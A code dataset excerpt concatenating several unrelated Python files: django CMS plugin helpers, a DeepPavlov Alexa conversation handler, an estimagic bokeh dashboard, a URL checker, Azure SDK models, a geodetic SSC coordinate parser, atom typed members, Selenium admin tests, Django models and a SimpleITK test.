plugin_lookup = {}
# make a map of plugin types, needed later for downcasting
for plugin in plugins:
plugin_types_map[plugin.plugin_type].append(plugin.pk)
for plugin_type, pks in plugin_types_map.items():
plugin_model = get_plugin_model(plugin_type)
plugin_queryset = plugin_model.objects.filter(pk__in=pks)
# put them in a map so we can replace the base CMSPlugins with their
# downcasted versions
for instance in plugin_queryset.iterator():
plugin_lookup[instance.pk] = instance
for plugin in plugins:
yield plugin_lookup.get(plugin.pk, plugin)
def get_plugin_data(plugin, only_meta=False):
if only_meta:
custom_data = None
else:
plugin_fields = get_plugin_fields(plugin.plugin_type)
_plugin_data = serializers.serialize('python', (plugin,), fields=plugin_fields)[0]
custom_data = _plugin_data['fields']
plugin_data = {
'pk': plugin.pk,
'creation_date': plugin.creation_date,
'position': plugin.position,
'plugin_type': plugin.plugin_type,
'parent_id': plugin.parent_id,
'data': custom_data,
}
return plugin_data
def get_active_operation(operations):
operations = operations.filter(is_applied=True)
try:
operation = operations.latest()
except ObjectDoesNotExist:
operation = None
return operation
def get_inactive_operation(operations, active_operation=None):
active_operation = active_operation or get_active_operation(operations)
if active_operation:
date_created = active_operation.date_created
operations = operations.filter(date_created__gt=date_created)
try:
operation = operations.filter(is_applied=False).earliest()
except ObjectDoesNotExist:
operation = None
return operation
def get_operations_from_request(request, path=None, language=None):
from .models import PlaceholderOperation
if not language:
language = get_language_from_request(language)
origin = path or request.path
# This is controversial :/
# By design, we don't let undo/redo span longer than a day.
# To be decided if/how this should be configurable.
date = timezone.now() - timedelta(days=1)
site = Site.objects.get_current(request)
queryset = PlaceholderOperation.objects.filter(
site=site,
origin=origin,
language=language,
user=request.user,
user_session_key=request.session.session_key,
date_created__gt=date,
is_archived=False,
)
return queryset
def disable_cms_plugin_signals(func):
# Skip this if we are using django CMS >= 3.6
if CMS_GTE_36:
return func
from cms.signals import (
post_delete_plugins, pre_delete_plugins, pre_save_plugins,
)
# The wrapped function NEEDS to set _no_reorder on any bound plugin instance
# otherwise this does nothing because it only disconnects signals
# for the cms.CMSPlugin class, not its subclasses
plugin_signals = (
(signals.pre_delete, pre_delete_plugins, 'cms_pre_delete_plugin', CMSPlugin),
(signals.pre_save, pre_save_plugins, 'cms_pre_save_plugin', CMSPlugin),
(signals.post_delete, post_delete_plugins, 'cms_post_delete_plugin', CMSPlugin),
)
def wrapper(*args, **kwargs):
for signal, handler, dispatch_id, model_class in plugin_signals:
signal.disconnect(
handler,
sender=model_class,
dispatch_uid=dispatch_id
)
signal.disconnect(handler, sender=model_class)
func(*args, **kwargs)
for signal, handler, dispatch_id, model_class in plugin_signals:
signal.connect(
handler,
sender=model_class,
dispatch_uid=dispatch_id
)
return wrapper
| nilq/baby-python | python |
# Copyright 2017 Neural Networks and Deep Learning lab, MIPT
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from threading import Timer
from copy import deepcopy
from typing import Optional
from deeppavlov.agents.default_agent.default_agent import DefaultAgent
from deeppavlov.core.agent.rich_content import RichMessage
from deeppavlov.core.common.log import get_logger
log = get_logger(__name__)
class Conversation:
"""Contains agent (if multi-instanced), receives requests, generates responses.
Args:
config: Alexa skill configuration settings.
agent: DeepPavlov Agent instance.
conversation_key: Alexa conversation ID.
self_destruct_callback: Conversation instance deletion callback function.
Attributes:
config: Alexa skill configuration settings.
agent: Alexa skill agent.
key: Alexa conversation ID.
stateful: Stateful mode flag.
timer: Conversation self-destruct timer.
handled_requests: Mapping of Alexa requests types to requests handlers.
response_template: Alexa response template.
"""
def __init__(self, config: dict, agent: DefaultAgent, conversation_key: str,
self_destruct_callback: callable) -> None:
self.config = config
self.agent = agent
self.key = conversation_key
self.self_destruct_callback = self_destruct_callback
self.stateful: bool = self.config['stateful']
self.timer: Optional[Timer] = None
self.handled_requests = {
'LaunchRequest': self._handle_launch,
'IntentRequest': self._handle_intent,
'SessionEndedRequest': self._handle_end,
'_unsupported': self._handle_unsupported
}
self.response_template = {
'version': '1.0',
'sessionAttributes': {
'sessionId': None
}
}
self._start_timer()
def _start_timer(self) -> None:
"""Initiates self-destruct timer."""
self.timer = Timer(self.config['conversation_lifetime'], self.self_destruct_callback)
self.timer.start()
def _rearm_self_destruct(self) -> None:
"""Rearms self-destruct timer."""
self.timer.cancel()
self._start_timer()
def handle_request(self, request: dict) -> dict:
"""Routes Alexa requests to appropriate handlers.
Args:
request: Alexa request.
Returns:
response: Response conforming Alexa response specification.
"""
request_type = request['request']['type']
request_id = request['request']['requestId']
log.debug(f'Received request. Type: {request_type}, id: {request_id}')
if request_type in self.handled_requests.keys():
response: dict = self.handled_requests[request_type](request)
else:
response: dict = self.handled_requests['_unsupported'](request)
log.warning(f'Unsupported request type: {request_type}, request id: {request_id}')
self._rearm_self_destruct()
return response
def _act(self, utterance: str) -> list:
"""Infers DeepPavlov agent with raw user input extracted from Alexa request.
Args:
utterance: Raw user input extracted from Alexa request.
Returns:
response: DeepPavlov agent response.
"""
if self.stateful:
utterance = [[utterance], [self.key]]
else:
utterance = [[utterance]]
agent_response: list = self.agent(*utterance)
return agent_response
def _generate_response(self, response: dict, request: dict) -> dict:
"""Populates generated response with additional data conforming Alexa response specification.
Args:
response: Raw user input extracted from Alexa request.
request: Alexa request.
Returns:
response: Response conforming Alexa response specification.
"""
response_template = deepcopy(self.response_template)
response_template['sessionAttributes']['sessionId'] = request['session']['sessionId']
for key, value in response_template.items():
if key not in response.keys():
response[key] = value
return response
def _handle_intent(self, request: dict) -> dict:
"""Handles IntentRequest Alexa request.
Args:
request: Alexa request.
Returns:
response: "response" part of response dict conforming Alexa specification.
"""
intent_name = self.config['intent_name']
slot_name = self.config['slot_name']
request_id = request['request']['requestId']
request_intent: dict = request['request']['intent']
if intent_name != request_intent['name']:
log.error(f"Wrong intent name received: {request_intent['name']} in request {request_id}")
return {'error': 'wrong intent name'}
if slot_name not in request_intent['slots'].keys():
log.error(f'No slot named {slot_name} found in request {request_id}')
return {'error': 'no slot found'}
utterance = request_intent['slots'][slot_name]['value']
agent_response = self._act(utterance)
if not agent_response:
log.error(f'Some error during response generation for request {request_id}')
return {'error': 'error during response generation'}
prediction: RichMessage = agent_response[0]
prediction: list = prediction.alexa()
if not prediction:
log.error(f'Some error during response generation for request {request_id}')
return {'error': 'error during response generation'}
response = self._generate_response(prediction[0], request)
return response
def _handle_launch(self, request: dict) -> dict:
"""Handles LaunchRequest Alexa request.
Args:
request: Alexa request.
Returns:
response: "response" part of response dict conforming Alexa specification.
"""
response = {
'response': {
'shouldEndSession': False,
'outputSpeech': {
'type': 'PlainText',
'text': self.config['start_message']
},
'card': {
'type': 'Simple',
'content': self.config['start_message']
}
}
}
response = self._generate_response(response, request)
return response
def _handle_end(self, request: dict) -> dict:
"""Handles SessionEndedRequest Alexa request and deletes Conversation instance.
Args:
request: Alexa request.
Returns:
response: Dummy empty response dict.
"""
response = {}
self.self_destruct_callback()
return response
def _handle_unsupported(self, request: dict) -> dict:
"""Handles all unsupported types of Alexa requests. Returns standard message.
Args:
request: Alexa request.
Returns:
response: "response" part of response dict conforming Alexa specification.
"""
response = {
'response': {
'shouldEndSession': False,
'outputSpeech': {
'type': 'PlainText',
'text': self.config['unsupported_message']
},
'card': {
'type': 'Simple',
'content': self.config['unsupported_message']
}
}
}
response = self._generate_response(response, request)
return response
| nilq/baby-python | python |
"""Show the development of one optimization's criterion and parameters over time."""
from functools import partial
from pathlib import Path
import numpy as np
import pandas as pd
from bokeh.layouts import Column
from bokeh.layouts import Row
from bokeh.models import ColumnDataSource
from bokeh.models import Panel
from bokeh.models import Tabs
from bokeh.models import Toggle
from estimagic.dashboard.monitoring_callbacks import activation_callback
from estimagic.dashboard.monitoring_callbacks import logscale_callback
from estimagic.dashboard.plot_functions import plot_time_series
from estimagic.logging.database_utilities import load_database
from estimagic.logging.database_utilities import read_last_rows
from estimagic.logging.read_log import read_start_params
from jinja2 import Environment
from jinja2 import FileSystemLoader
def monitoring_app(
doc,
database_name,
session_data,
updating_options,
start_immediately,
):
"""Create plots showing the development of the criterion and parameters.
Args:
doc (bokeh.Document): Argument required by bokeh.
database_name (str): Short and unique name of the database.
session_data (dict): Infos to be passed between and within apps.
Keys of this app's entry are:
- last_retrieved (int): last iteration currently in the ColumnDataSource.
- database_path (str or pathlib.Path)
- callbacks (dict): dictionary to be populated with callbacks.
updating_options (dict): Specification how to update the plotting data.
It contains rollover, update_frequency, update_chunk, jump and stride.
"""
# style the Document
template_folder = Path(__file__).resolve().parent
# conversion to string from pathlib Path is necessary for FileSystemLoader
env = Environment(loader=FileSystemLoader(str(template_folder)))
doc.template = env.get_template("index.html")
# process inputs
database = load_database(path=session_data["database_path"])
start_point = _calculate_start_point(database, updating_options)
session_data["last_retrieved"] = start_point
start_params = read_start_params(path_or_database=database)
start_params["id"] = _create_id_column(start_params)
group_to_param_ids = _map_group_to_other_column(start_params, "id")
group_to_param_names = _map_group_to_other_column(start_params, "name")
criterion_history, params_history = _create_cds_for_monitoring_app(
group_to_param_ids
)
# create elements
button_row = _create_button_row(
doc=doc,
database=database,
session_data=session_data,
start_params=start_params,
updating_options=updating_options,
)
monitoring_plots = _create_initial_convergence_plots(
criterion_history=criterion_history,
params_history=params_history,
group_to_param_ids=group_to_param_ids,
group_to_param_names=group_to_param_names,
)
# add elements to bokeh Document
grid = Column(children=[button_row, *monitoring_plots], sizing_mode="stretch_width")
convergence_tab = Panel(child=grid, title="Convergence Tab")
tabs = Tabs(tabs=[convergence_tab])
doc.add_root(tabs)
if start_immediately:
activation_button = doc.get_model_by_name("activation_button")
activation_button.active = True
def _create_id_column(df):
"""Create a column that gives the position for plotted parameters and is None else.
Args:
df (pd.DataFrame)
Returns:
ids (pd.Series): integer position in the DataFrame unless the group was
None, False, np.nan or an empty string.
"""
ids = pd.Series(range(len(df)), dtype=object, index=df.index)
ids[df["group"].isin([None, False, np.nan, ""])] = None
return ids.astype(str)
def _map_group_to_other_column(params, column_name):
"""Map the group name to lists of one column's values of the group's parameters.
Args:
params (pd.DataFrame): Includes the "group" and "id" columns.
column_name (str): name of the column for which to return the parameter values.
Returns:
group_to_values (dict): Keys are the values of the "group" column.
The values are lists of parameter values of the parameters belonging
to the particular group.
"""
to_plot = params[~params["group"].isin([None, False, np.nan, ""])]
group_to_indices = to_plot.groupby("group").groups
group_to_values = {}
for group, loc in group_to_indices.items():
group_to_values[group] = to_plot[column_name].loc[loc].tolist()
return group_to_values
def _create_cds_for_monitoring_app(group_to_param_ids):
"""Create the ColumnDataSources for saving the criterion and parameter values.
They will be periodically updated from the database.
There is a ColumnDataSource for all parameters and one for the criterion value.
The "x" column is called "iteration".
Args:
group_to_param_ids (dict): Keys are the groups to be plotted. The values are
the ids of the parameters belonging to the particular group.
Returns:
criterion_history (bokeh.ColumnDataSource)
params_history (bokeh.ColumnDataSource)
"""
crit_data = {"iteration": [], "criterion": []}
criterion_history = ColumnDataSource(crit_data, name="criterion_history_cds")
param_ids = []
for id_list in group_to_param_ids.values():
param_ids += id_list
params_data = {id_: [] for id_ in param_ids + ["iteration"]}
params_history = ColumnDataSource(params_data, name="params_history_cds")
return criterion_history, params_history
def _calculate_start_point(database, updating_options):
"""Calculate the starting point.
Args:
database (sqlalchemy.MetaData): Bound metadata object.
updating_options (dict): Specification how to update the plotting data.
It contains rollover, update_frequency, update_chunk, jump and stride.
Returns:
start_point (int): iteration from which to start the dashboard.
"""
if updating_options["jump"]:
last_entry = read_last_rows(
database=database,
table_name="optimization_iterations",
n_rows=1,
return_type="list_of_dicts",
)
nr_of_entries = last_entry[0]["rowid"]
nr_to_go_back = updating_options["rollover"] * updating_options["stride"]
start_point = max(0, nr_of_entries - nr_to_go_back)
else:
start_point = 0
return start_point
def _create_initial_convergence_plots(
criterion_history,
params_history,
group_to_param_ids,
group_to_param_names,
):
"""Create the initial convergence plots.
Args:
criterion_history (bokeh ColumnDataSource)
params_history (bokeh ColumnDataSource)
group_to_param_ids (dict): Keys are the groups to be plotted. Values are the
ids of the parameters belonging to the respective group.
group_to_param_names (dict): Keys are the groups to be plotted. Values are the
names of the parameters belonging to the respective group.
Returns:
convergence_plots (list): List of bokeh Row elements, each containing one
convergence plot.
"""
param_plots = []
for group, param_ids in group_to_param_ids.items():
param_names = group_to_param_names[group]
param_group_plot = plot_time_series(
data=params_history,
y_keys=param_ids,
y_names=param_names,
x_name="iteration",
title=str(group),
)
param_plots.append(param_group_plot)
arranged_param_plots = [Row(plot) for plot in param_plots]
linear_criterion_plot = plot_time_series(
data=criterion_history,
x_name="iteration",
y_keys=["criterion"],
y_names=["criterion"],
title="Criterion",
name="linear_criterion_plot",
logscale=False,
)
log_criterion_plot = plot_time_series(
data=criterion_history,
x_name="iteration",
y_keys=["criterion"],
y_names=["criterion"],
title="Criterion",
name="log_criterion_plot",
logscale=True,
)
log_criterion_plot.visible = False
plot_list = [
Row(linear_criterion_plot),
Row(log_criterion_plot),
] + arranged_param_plots
return plot_list
def _create_button_row(
doc,
database,
session_data,
start_params,
updating_options,
):
"""Create a row with two buttons, one for (re)starting and one for scale switching.
Args:
doc (bokeh.Document)
database (sqlalchemy.MetaData): Bound metadata object.
session_data (dict): dictionary with the last retrieved rowid
start_params (pd.DataFrame): See :ref:`params`
updating_options (dict): Specification how to update the plotting data.
It contains rollover, update_frequency, update_chunk, jump and stride.
Returns:
bokeh.layouts.Row
"""
# (Re)start convergence plot button
activation_button = Toggle(
active=False,
label="Start Updating",
button_type="danger",
width=200,
height=30,
name="activation_button",
)
partialed_activation_callback = partial(
activation_callback,
button=activation_button,
doc=doc,
database=database,
session_data=session_data,
tables=["criterion_history", "params_history"],
start_params=start_params,
updating_options=updating_options,
)
activation_button.on_change("active", partialed_activation_callback)
# switch between linear and logscale button
logscale_button = Toggle(
active=False,
label="Show criterion plot on a logarithmic scale",
button_type="default",
width=200,
height=30,
name="logscale_button",
)
partialed_logscale_callback = partial(
logscale_callback,
button=logscale_button,
doc=doc,
)
logscale_button.on_change("active", partialed_logscale_callback)
button_row = Row(children=[activation_button, logscale_button], name="button_row")
return button_row
| nilq/baby-python | python |
import sys
import re
def check_url(url):
patt = '^(\w+)://([0-9a-z.]+)(:\d+)?(?:/([0-9a-z_/.]+)?(\S+)?)?$'
m = re.match(patt, url, re.I)
if m:
schema = m.group(1)
port = m.group(3)
if port is None and schema == 'http':
port = 80
return {'schema': schema, 'hostname': m.group(2), 'port': port, 'path': m.group(4), 'qs': m.group(5)}
else:
return None
if __name__ == '__main__':
print(check_url(sys.argv[1])) | nilq/baby-python | python |
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from msrest.serialization import Model
class CognitiveServicesAccountCreateParameters(Model):
"""The parameters to provide for the account.
All required parameters must be populated in order to send to Azure.
:param sku: Required. Required. Gets or sets the SKU of the resource.
:type sku: ~azure.mgmt.cognitiveservices.models.Sku
:param kind: Required. Required. Gets or sets the Kind of the resource.
Possible values include: 'Bing.Autosuggest.v7', 'Bing.CustomSearch',
'Bing.Search.v7', 'Bing.Speech', 'Bing.SpellCheck.v7', 'ComputerVision',
'ContentModerator', 'CustomSpeech', 'CustomVision.Prediction',
'CustomVision.Training', 'Emotion', 'Face', 'LUIS', 'QnAMaker',
'SpeakerRecognition', 'SpeechTranslation', 'TextAnalytics',
'TextTranslation', 'WebLM'
:type kind: str or ~azure.mgmt.cognitiveservices.models.Kind
:param location: Required. Required. Gets or sets the location of the
resource. This will be one of the supported and registered Azure Geo
Regions (e.g. West US, East US, Southeast Asia, etc.). The geo region of a
resource cannot be changed once it is created, but if an identical geo
region is specified on update the request will succeed.
:type location: str
:param tags: Gets or sets a list of key value pairs that describe the
resource. These tags can be used in viewing and grouping this resource
(across resource groups). A maximum of 15 tags can be provided for a
resource. Each tag must have a key no greater than 128 characters and
value no greater than 256 characters.
:type tags: dict[str, str]
:param properties: Required. Must exist in the request. Must be an empty
object. Must not be null.
:type properties: object
"""
_validation = {
'sku': {'required': True},
'kind': {'required': True},
'location': {'required': True},
'properties': {'required': True},
}
_attribute_map = {
'sku': {'key': 'sku', 'type': 'Sku'},
'kind': {'key': 'kind', 'type': 'str'},
'location': {'key': 'location', 'type': 'str'},
'tags': {'key': 'tags', 'type': '{str}'},
'properties': {'key': 'properties', 'type': 'object'},
}
def __init__(self, *, sku, kind, location: str, properties, tags=None, **kwargs) -> None:
super(CognitiveServicesAccountCreateParameters, self).__init__(**kwargs)
self.sku = sku
self.kind = kind
self.location = location
self.tags = tags
self.properties = properties
| nilq/baby-python | python |
#! /usr/bin/python3
#-*- coding: utf-8 -*-
from __future__ import print_function
import datetime
import sys
import re
class SscSite:
def __init__(self, **kwargs):
self.domes = kwargs['domes']
self.site_name = kwargs['site_name']
self.id = kwargs['id']
self.data_start = kwargs['data_start']
self.data_stop = kwargs['data_stop']
self.ref_epoch = kwargs['ref_epoch']
self.soln = int(kwargs['soln'])
self.x = float(kwargs['x'])
self.sx = float(kwargs['sx']) if 'sx' in kwargs else 0e0
self.y = float(kwargs['y'])
self.sx = float(kwargs['sy']) if 'sy' in kwargs else 0e0
self.z = float(kwargs['z'])
self.sz = float(kwargs['sz']) if 'sz' in kwargs else 0e0
self.vx = float(kwargs['vx'])
self.svx = float(kwargs['svx']) if 'svx' in kwargs else 0e0
self.vy = float(kwargs['vy'])
self.svx = float(kwargs['svy']) if 'svy' in kwargs else 0e0
self.vz = float(kwargs['vz'])
self.svz = float(kwargs['svz']) if 'svz' in kwargs else 0e0
def extrapolate(self, dt):
# print('\t>> extrapolating from SOLN={:}'.format(self.soln))
days = float((dt-self.ref_epoch).days)
years = days / 365.25e0
return self.x + self.vx*years, self.y + self.vy*years, self.z + self.vz*years
def parse_ssc_date(dstr, default=datetime.datetime.min):
if dstr.strip() == '00:000:00000':
return default
flds = dstr.split(':')
return datetime.datetime.strptime(':'.join(flds[0:2]), '%y:%j') + datetime.timedelta(seconds=int(flds[2]))
def min_of_ssc_records_of_same_site(ssc_recs):
rec = ssc_recs[0]
for i in ssc_recs[1:]:
if i.soln < rec.soln:
rec = i
return rec
def max_of_ssc_records_of_same_site(ssc_recs):
rec = ssc_recs[0]
for i in ssc_recs[1:]:
if i.soln > rec.soln:
rec = i
return rec
def match_site_in_rec_list(site, list):
for s in list:
if s.site_name == site.site_name:
return True
return False
def unique_records(ssc_records, dt):
ssc_unique_records = []
for site in ssc_records:
if not match_site_in_rec_list(site, ssc_unique_records):
# print('>> processing site {:}'.format(site.id))
site_recs = [s for s in ssc_records if s.site_name == site.site_name]
# print('\t>> num of entries = {:}'.format(len(site_recs)))
rec = None
max_date = datetime.datetime.min
min_date = datetime.datetime.max
for s in site_recs:
if s.data_start < min_date: min_date = s.data_start
if s.data_stop > max_date: max_date = s.data_stop
if dt >= s.data_start and dt <= s.data_stop:
ssc_unique_records.append(s)
rec = s
# print('\t>> matched interval! breaking ....')
break
if rec is None:
if dt < min_date:
ssc_unique_records.append(min_of_ssc_records_of_same_site(site_recs))
# print('\t>> interval unmatched, adding min soln ...')
elif dt > max_date:
ssc_unique_records.append(max_of_ssc_records_of_same_site(site_recs))
# print('\t>> interval unmatched, adding max soln ...')
else:
## probably no dt is between intervals ....
print('[WRNNG] No solution interval contains epoch {:} for site {:}_{:}; site skipped, don\'t know what to do!'.format(dt.strftime('%Y-%jT%H:%M'), site.id, site.domes), file=sys.stderr)
return ssc_unique_records
def parse_ssc(ssc_fn, station_list=[], dt=None):
ssc_records = []
with open(ssc_fn, 'r') as fin:
line = fin.readline()
while line and not line.lstrip().startswith('DOMES NB. SITE NAME TECH. ID.'):
line = fin.readline()
## 2 header lines
if not line:
errmsg = '[ERROR] Failed to find header line in SSC file {:}'.format(ssc_fn)
print(errmsg, file=sys.stderr)
raise RuntimeError(errmsg)
if not re.match(r"DOMES\s+NB\.\s+SITE NAME\s+TECH\. ID\.\s+X/Vx\s+Y/Vy\s+Z/Vz\.?\s+Sigmas\s+SOLN\s+DATA_START\s+DATA_END\s+REF\.\s+EPOCH", line.strip()):
errmsg = '[ERROR] Failed matching (column) header line! SSC file {:}'.format(ssc_fn)
print('[ERROR] Failed to resolve line: [{:}]'.format(line.strip()))
raise RuntimeError(errmsg)
line = fin.readline()
## examples of this line:
##[ CLASS ----------------------------m/m/Y-------------------------------------] (epn class A ssc)
##[<> -----------------------m/m/Y-------------------------] (epnd ssc)
assert(re.match(r"\s*[A-Z<>]*\s*-*m/m/Y-*", line.strip()))
line = fin.readline()
assert(line.strip().startswith('----------------------'))
## done with header, parse data
line = fin.readline()
while line:
domes, site_name, tech, id, x, y, z, sx, sy, sz, soln, data_start, data_end, ref_epoch = line.split()
x, y, z, sx, sy, sz = [float(n) for n in [x, y, z, sx, sy, sz]]
data_start, data_end, ref_epoch = [parse_ssc_date(d) for d in [data_start, data_end, ref_epoch]]
if data_end == datetime.datetime.min: data_end = datetime.datetime.max
line = fin.readline()
domes2, vx, vy, vz, svx, svy, svz = line.split()
assert(domes2 == domes)
vx, vy, vz, svx, svy, svz = [float(n) for n in [vx, vy, vz, svx, svy, svz]]
if site_name.lower() in [s.lower() for s in station_list] or station_list==[] and dt>=data_start :
ssc_records.append(SscSite(domes=domes, site_name=site_name, id=id, soln=soln, data_start=data_start, data_stop=data_end, ref_epoch=ref_epoch, x=x, y=y, z=z, sx=sx, sy=sy, sz=sz, vx=vx, vy=vy, vz=vz))
line = fin.readline()
return ssc_records if dt is None else unique_records(ssc_records, dt)
def ssc2crd(station_list, dt, *ssc_fn, **kwargs):
sta_list = station_list
sscsite_list = []
for ssc in ssc_fn:
# print('>> parsing ssc file {:}'.format(ssc))
records = parse_ssc(ssc, sta_list, dt)
for sta in records:
index = [s.lower() for s in sta_list].index(sta.site_name.lower())
if index >= 0:
sta_list[index] = 'xxxx'
sscsite_list += records
header = kwargs['header'] if 'header' in kwargs else 'Coordinate Extrapolation from pybern'
datum = kwargs['datum'] if 'datum' in kwargs else 'IGS_14'
flag = kwargs['flag'] if 'flag' in kwargs else 'APR'
with open(bcrd_out, 'w') as bout:
print("{:}".format(header), file=bout)
print("--------------------------------------------------------------------------------", file=bout)
print("LOCAL GEODETIC DATUM: {:} EPOCH: 2010-01-01 00:00:00".format(datum, dt.strftime("%Y-%m-%d %H:%M:%S")), file=bout)
print("", file=bout)
print("NUM STATION NAME X (M) Y (M) Z (M) FLAG", file=bout)
print("", file=bout)
for record in sscsite_list:
x, y, z = record.extrapolate(dt)
print('{:} {:} {:+15.3f} {:+15.3f} {:+15.3f}'.format(record.id, record.domes, x, y, z))
| nilq/baby-python | python |
#------------------------------------------------------------------------------
# Copyright (c) 2013-2017, Nucleic Development Team.
#
# Distributed under the terms of the Modified BSD License.
#
# The full license is in the file LICENSE, distributed with this software.
#------------------------------------------------------------------------------
from .catom import Member, DefaultValue, Validate
class Typed(Member):
""" A value which allows objects of a given type or types.
Values will be tested using the `PyObject_TypeCheck` C API call.
This call is equivalent to `type(obj) in cls.mro()`. It is less
flexible but faster than Instance. Use Instance when allowing
heterogenous values and Typed when the value type is explicit.
The value of a Typed may be set to None
"""
__slots__ = ()
def __init__(self, kind, args=None, kwargs=None, factory=None):
""" Initialize an Typed.
Parameters
----------
kind : type
The allowed type for the value.
args : tuple, optional
If 'factory' is None, then 'kind' is a callable type and
these arguments will be passed to the constructor to create
the default value.
kwargs : dict, optional
If 'factory' is None, then 'kind' is a callable type and
these keywords will be passed to the constructor to create
the default value.
factory : callable, optional
An optional factory to use for creating the default value.
If this is not provided and 'args' and 'kwargs' is None,
then the default value will be None.
"""
if factory is not None:
self.set_default_value_mode(DefaultValue.CallObject, factory)
elif args is not None or kwargs is not None:
args = args or ()
kwargs = kwargs or {}
factory = lambda: kind(*args, **kwargs)
self.set_default_value_mode(DefaultValue.CallObject, factory)
self.set_validate_mode(Validate.Typed, kind)
class ForwardTyped(Typed):
""" A Typed which delays resolving the type definition.
The first time the value is accessed or modified, the type will
be resolved and the forward typed will behave identically to a
normal typed.
"""
__slots__ = ('resolve', 'args', 'kwargs')
def __init__(self, resolve, args=None, kwargs=None, factory=None):
""" Initialize a ForwardTyped.
resolve : callable
A callable which takes no arguments and returns the type to
use for validating the values.
args : tuple, optional
If 'factory' is None, then 'resolve' will return a callable
type and these arguments will be passed to the constructor
to create the default value.
kwargs : dict, optional
If 'factory' is None, then 'resolve' will return a callable
type and these keywords will be passed to the constructor to
create the default value.
factory : callable, optional
An optional factory to use for creating the default value.
If this is not provided and 'args' and 'kwargs' is None,
then the default value will be None.
"""
self.resolve = resolve
self.args = args
self.kwargs = kwargs
if factory is not None:
self.set_default_value_mode(DefaultValue.CallObject, factory)
elif args is not None or kwargs is not None:
mode = DefaultValue.MemberMethod_Object
self.set_default_value_mode(mode, "default")
self.set_validate_mode(Validate.MemberMethod_ObjectOldNew, "validate")
def default(self, owner):
""" Called to retrieve the default value.
This is called the first time the default value is retrieved
for the member. It resolves the type and updates the internal
default handler to behave like a normal Typed member.
"""
kind = self.resolve()
args = self.args or ()
kwargs = self.kwargs or {}
factory = lambda: kind(*args, **kwargs)
self.set_default_value_mode(DefaultValue.CallObject, factory)
return kind(*args, **kwargs)
def validate(self, owner, old, new):
""" Called to validate the value.
This is called the first time a value is validated for the
member. It resolves the type and updates the internal validate
handler to behave like a normal Typed member.
"""
kind = self.resolve()
self.set_validate_mode(Validate.Typed, kind)
return self.do_validate(owner, old, new)
def clone(self):
""" Create a clone of the ForwardTyped instance.
"""
clone = super(ForwardTyped, self).clone()
clone.resolve = self.resolve
clone.args = self.args
clone.kwargs = self.kwargs
return clone
| nilq/baby-python | python |
import unittest
from selenium import webdriver
class AdminLoginPageTest(unittest.TestCase):
def setUp(self):
self.admin_username = self.admin_password = 'admin'
self.site_title = 'Global Trade Motors'
self.browser = webdriver.Firefox()
self.browser.get("http://localhost:8000/admin")
def tearDown(self):
self.browser.quit()
def test_site_title(self):
self.assertIn(
self.site_title,
self.browser.title
)
def test_site_header_name(self):
header = self.browser.find_element_by_tag_name('h1')
self.assertEquals(
self.site_title,
header.text
)
class AdminHomePageTest(unittest.TestCase):
def setUp(self):
self.site_title = 'Global Trade Motors'
self.admin_username = self.admin_password = 'admin'
self.browser = webdriver.Firefox()
self.browser.get("http://localhost:8000/admin")
self.login()
def tearDown(self):
self.browser.quit()
def login(self):
self.browser.find_element_by_id(
'id_username').send_keys(self.admin_username)
password = self.browser.find_element_by_id(
'id_password')
password.send_keys(self.admin_password)
password.send_keys('\n')
def test_site_branding_header(self):
site_name = self.browser.find_element_by_id('site-name')
self.assertEquals(
self.site_title,
site_name.text
)
if __name__ == '__main__':
unittest.main()
| nilq/baby-python | python |
from django.db import models
from django.contrib.auth.models import User
# Create your models here.
class Product(models.Model):
productname=models.CharField(max_length= 255)
productdescription=models.TextField(null=True, blank=True)
productusage=models.TextField(null=True, blank=True)
productquantity=models.IntegerField()
user=models.ForeignKey(User, on_delete = models.DO_NOTHING)
productcost=models.IntegerField()
def __str__(self):
return self.productname
class Meta:
db_table = 'Product'
class Monk(models.Model):
monkname=models.CharField(max_length= 255)
monkage=models.IntegerField()
user=models.ManyToManyField(User)
def __str__(self):
return self.monkname
class Meta:
db_table = 'Monk'
class Member(models.Model):
membername=models.CharField(max_length= 255)
memberage=models.IntegerField()
user=models.ManyToManyField(User)
memberaddress=models.CharField(max_length=255)
membercity=models.CharField(max_length=50)
memberstate=models.CharField(max_length=2)
memberzip=models.IntegerField(max_length=5)
memberphone=models.IntegerField(max_length=11)
def __str__(self):
return self. membername
class Meta:
db_table = 'Member'
| nilq/baby-python | python |
#==========================================================================
#
# Copyright Insight Software Consortium
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0.txt
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
#==========================================================================*/
from __future__ import print_function
import sys
import unittest
import datetime as dt
import timeit
import SimpleITK as sitk
import numpy as np
sizeX = 4
sizeY = 5
sizeZ = 3
newSimpleITKPixelValueInt32 = -3000
newNumPyElementValueInt32 = 200
class TestNumpySimpleITKMemoryviewInterface(unittest.TestCase):
""" This tests numpy array <-> SimpleITK Image conversion. """
def setUp(self):
pass
def _helper_check_sitk_to_numpy_type(self, sitkType, numpyType):
if sitkType == sitk.sitkUnknown:
return
image = sitk.Image((9, 10), sitkType, 1)
a = sitk.GetArrayViewFromImage(image)
self.assertEqual(numpyType, a.dtype)
self.assertEqual((10, 9), a.shape)
def test_type_to_numpy(self):
"try all sitk pixel types to convert to NumPy array view"
self._helper_check_sitk_to_numpy_type(sitk.sitkUInt8, np.uint8)
self._helper_check_sitk_to_numpy_type(sitk.sitkUInt16, np.uint16)
self._helper_check_sitk_to_numpy_type(sitk.sitkUInt32, np.uint32)
self._helper_check_sitk_to_numpy_type(sitk.sitkUInt64, np.uint64)
self._helper_check_sitk_to_numpy_type(sitk.sitkInt8, np.int8)
self._helper_check_sitk_to_numpy_type(sitk.sitkInt16, np.int16)
